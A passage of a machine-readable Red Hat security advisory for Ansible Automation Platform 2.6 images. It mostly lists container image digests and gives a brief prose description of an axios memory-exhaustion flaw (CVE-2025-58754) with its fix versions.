"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "event-driven-ansible: Sensitive Internal Headers Disclosure in AAP EDA Event Streams"
},
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-09-12T02:00:53.897605+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2394735"
}
],
"notes": [
{
"category": "description",
"text": "Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios DoS via lack of data size check",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Availability impact is limited to the application which bundles axios and not the host Red Hat system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
